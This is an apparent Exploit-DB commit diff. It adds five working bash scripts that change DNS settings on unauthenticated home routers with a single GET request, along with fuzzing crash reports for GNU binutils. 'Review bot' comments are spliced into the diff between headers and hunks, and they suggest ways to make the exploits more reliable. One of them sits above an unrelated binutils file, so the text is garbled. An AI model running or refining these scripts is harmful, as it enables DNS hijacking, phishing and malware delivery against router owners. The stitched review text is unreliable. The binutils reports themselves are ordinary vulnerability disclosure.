From 380d33dd22ae310dd91103288129a7908d90d759 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 20 Jun 2017 05:01:28 +0000 Subject: [PATCH] DB: 2017-06-20 13 new exploits GNU binutils - 'rx_decode_opcode' Buffer Overflow GNU binutils - 'disassemble_bytes' Heap Overflow GNU binutils - 'bfd_get_string' Stack Buffer Overflow GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow GNU binutils - 'ieee_object_p' Stack Buffer Overflow GNU binutils - 'print_insn_score16' Buffer Overflow GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow iBall Baton iB-WRA150N - Unauthenticated DNS Change nuevoMailer 6.0 - SQL Injection UTstarcom WA3002G4 - Unauthenticated DNS Change D-Link DSL-2640U - Unauthenticated DNS Change Beetel BCM96338 Router - Unauthenticated DNS Change D-Link DSL-2640B - Unauthenticated Remote DNS Change --- files.csv | 13 +++++ platforms/hardware/webapps/42192.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42194.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42195.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42196.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42197.sh | 82 +++++++++++++++++++++++++++++ platforms/linux/dos/42198.txt | 43 +++++++++++++++ platforms/linux/dos/42199.txt | 78 +++++++++++++++++++++++++++ platforms/linux/dos/42200.txt | 41 +++++++++++++++ platforms/linux/dos/42201.txt | 70 ++++++++++++++++++++++++ platforms/linux/dos/42202.txt | 37 +++++++++++++ platforms/linux/dos/42203.txt | 43 +++++++++++++++ platforms/linux/dos/42204.txt | 44 ++++++++++++++++ platforms/php/webapps/42193.txt | 27 ++++++++++ 14 files changed, 806 insertions(+) create mode 100755 platforms/hardware/webapps/42192.sh create mode 100755 platforms/hardware/webapps/42194.sh create mode 100755 platforms/hardware/webapps/42195.sh create mode 100755 platforms/hardware/webapps/42196.sh create mode 100755 platforms/hardware/webapps/42197.sh create mode 100755 platforms/linux/dos/42198.txt create mode 100755 platforms/linux/dos/42199.txt create mode 
100755 platforms/linux/dos/42200.txt
create mode 100755 platforms/linux/dos/42201.txt
create mode 100755 platforms/linux/dos/42202.txt
create mode 100755 platforms/linux/dos/42203.txt
create mode 100755 platforms/linux/dos/42204.txt
create mode 100755 platforms/php/webapps/42193.txt
diff --git a/files.csv b/files.csv
index db729746c..9b566c5eb 100644
--- a/files.csv
+++ b/files.csv
@@ -5548,6 +5548,13 @@ id,file,description,date,author,platform,type,port
 42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
 42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
 42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
+42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42201,platforms/linux/dos/42201.txt,"GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42202,platforms/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42203,platforms/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42204,platforms/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -38016,3 +38023,9 @@ id,file,description,date,author,platform,type,port
 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
 42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0
 42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0
+42192,platforms/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps,0
+42193,platforms/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0
+42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
+42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
+42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
+42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0
diff --git a/platforms/hardware/webapps/42192.sh b/platforms/hardware/webapps/42192.sh
new file mode 100755
index 000000000..00475bd59
--- /dev/null
+++ b/platforms/hardware/webapps/42192.sh
@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+# iBall Baton iB-WRA150N
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2016 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " iBall Baton iB-WRA150N "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/hardware/webapps/42194.sh b/platforms/hardware/webapps/42194.sh
new file mode 100755
index 000000000..28bf82114
--- /dev/null
+++ b/platforms/hardware/webapps/42194.sh
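Review bot: The request line `GET -e "http://$1/dnscfg.cgi?..." 0&> /dev/null <&1` is almost certainly a mangled redirection: bash only takes a leading digit as a descriptor before `>`/`<`-family operators, so the `0` is most likely handed to GET as an extra argument and `<&1` then points stdin at stdout; `&> /dev/null` alone appears to be what was meant. Throwing the whole response away also leaves the operator with no way to tell whether the device accepted the change, so `GET -s -d "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1"` (status line only, body dropped) followed by a check of `$?` would be more useful. Both error branches end in a bare `exit;`, which returns 0 to a caller, so `exit 1` there would let scripted use detect the usage and missing-libwww-perl cases. The header says `Copyright 2016` while the banner prints 2017; one of them is stale.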
@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+# UTstarcom WA3002G4
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " UTstarcom WA3002G4 "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/hardware/webapps/42195.sh b/platforms/hardware/webapps/42195.sh
new file mode 100755
index 000000000..7c7ad317c
--- /dev/null
+++ b/platforms/hardware/webapps/42195.sh
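Review bot: The target and DNS arguments are spliced straight into the query string on the `GET -e ...` line with no validation, so a stray `&`, a space or a hostname silently yields a request the device will not parse; a guard such as `[[ $2 =~ ^([0-9]{1,3}\.){3}[0-9]{1,3}$ ]] || { echo " Error : primary DNS must be an IPv4 address"; exit 1; }` (and the same for `$3` when it is given) would fail fast instead. The trailing `0&> /dev/null <&1` also reads like a garbled `&> /dev/null` — as written the `0` is most likely an extra argument to GET rather than a descriptor — and with all output discarded nothing tells the caller whether the change took. Dropping the redirection in favour of `GET -s -d` plus a check of `$?` addresses both.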
@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+# D-Link ADSL DSL-2640U IM_1.00
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " D-Link ADSL DSL-2640U IM_1.00 "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/hardware/webapps/42196.sh b/platforms/hardware/webapps/42196.sh
new file mode 100755
index 000000000..7821c10e7
--- /dev/null
+++ b/platforms/hardware/webapps/42196.sh
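Review bot: Neither error path sets a failure status — the usage branch and the libwww-perl check both end in `exit;`, which exits 0 — so a wrapper looping over targets cannot tell a missing dependency from a sent request; `exit 1` in both places fixes that. The only real work is the `GET -e` line, and its `0&> /dev/null <&1` tail appears to be a corrupted `&> /dev/null` (the `0` is most likely passed to GET as an argument, since bash attaches a descriptor digit only to `>`/`<`-family operators). Because the response is discarded either way, replacing it with `GET -s -d "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1"` and testing `$?` would give the operator the HTTP status instead of silence.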
@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+# Beetel BCM96338 ADSL Router
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " Beetel BCM96338 ADSL Router "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/hardware/webapps/42197.sh b/platforms/hardware/webapps/42197.sh
new file mode 100755
index 000000000..4d1fa431a
--- /dev/null
+++ b/platforms/hardware/webapps/42197.sh
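Review bot: With every byte of the response sent to `/dev/null` on the `GET -e` line, the script exits 0 whether the router applied the new servers, answered with a login page or was unreachable; for a one-shot change like this the status line is the result, so `GET -s -d "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1"` should replace the `0&> /dev/null <&1` tail, which in any case reads like a mangled `&> /dev/null` with the `0` most likely ending up as a stray GET argument. The `exit;` on the two error branches should be `exit 1` for the same reason. When `$3` is omitted the URL still carries `dnsSecondary=` with an empty value; whether the firmware treats that as "unchanged" or "cleared" is not shown here and deserves a comment on that line.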
@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+# D-Link ADSL DSL-2640B GE_1.07
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " D-Link ADSL DSL-2640B GE_1.07 "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/linux/dos/42198.txt b/platforms/linux/dos/42198.txt
new file mode 100755
index 000000000..25b2981b3
--- /dev/null
+++ b/platforms/linux/dos/42198.txt
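Review bot: The `0&> /dev/null <&1` ending of the `GET -e` line does not do what a reader expects: bash treats a leading digit as a descriptor only before `>`/`<`-family operators, so the `0` most likely becomes a second argument to GET, `&>` then silences everything, and `<&1` rewires stdin. The simplest correct form is `GET -s -d "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1"` followed by `[ $? -eq 0 ] || exit 1`, so the caller gets the HTTP status and a meaningful exit code. The usage and dependency branches should likewise `exit 1` rather than `exit;`. The `Usage:` banner prints no argument placeholders — possibly lost in extraction, but if the file is the same, `Usage: $0 <target> <primary-dns> [secondary-dns]` is what the two examples imply.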
@@ -0,0 +1,43 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21587
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D `.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.min
+Output: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.txt
+
+Error in "rx_decode_opcode": global-buffer-overflow
+ in rx_decode_opcode at opcodes/rx-decode.opc:288
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-decode.opc#L288)
+ in print_insn_rx at opcodes/rx-dis.c:123
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-dis.c#L123)
+ in disassemble_bytes at binutils/objdump.c:1864
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42198.zip
diff --git a/platforms/linux/dos/42199.txt b/platforms/linux/dos/42199.txt
new file mode 100755
index 000000000..fd5787296
--- /dev/null
+++ b/platforms/linux/dos/42199.txt
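Review bot: The report pins the build to commit `561bf3e950e410fbcac06523d43039f1f58150ca` with `--enable-targets=all` but names no binutils release, and that configure flag is what compiles the RX disassembler (`opcodes/rx-decode.opc`) into objdump; an objdump built for its host target only would presumably never select `print_insn_rx` for this input, so an `Affected:` line naming the release range and the `--enable-targets=all` (or RX-enabled) requirement would stop readers over-scoping it. ASAN classifies the fault as `global-buffer-overflow`, an out-of-bounds access on a static table; the excerpt does not say whether it is a read or a write, and the entry title's "Buffer Overflow" implies more than is shown, so a sentence such as `Impact: out-of-bounds access reported under ASAN while disassembling; crash/DoS, no write demonstrated` would keep the impact honest. The reproduction command is printed as `objdump -D ` with the file-name placeholder missing.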
@@ -0,0 +1,78 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21580
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D `.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.min
+Output: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.txt
+
+Error in "disassemble_bytes": heap-buffer-overflow
+ in disassemble_bytes at binutils/objdump.c:1993
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1993)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Input: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.min
+Output: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.txt
+
+Error in "disassemble_bytes": heap-buffer-overflow
+ in disassemble_bytes at binutils/objdump.c:1932
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1932)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Input: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.min
+Output: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.txt
+
+Error in "disassemble_bytes": heap-buffer-overflow
+ in disassemble_bytes at binutils/objdump.c:1926
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1926)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
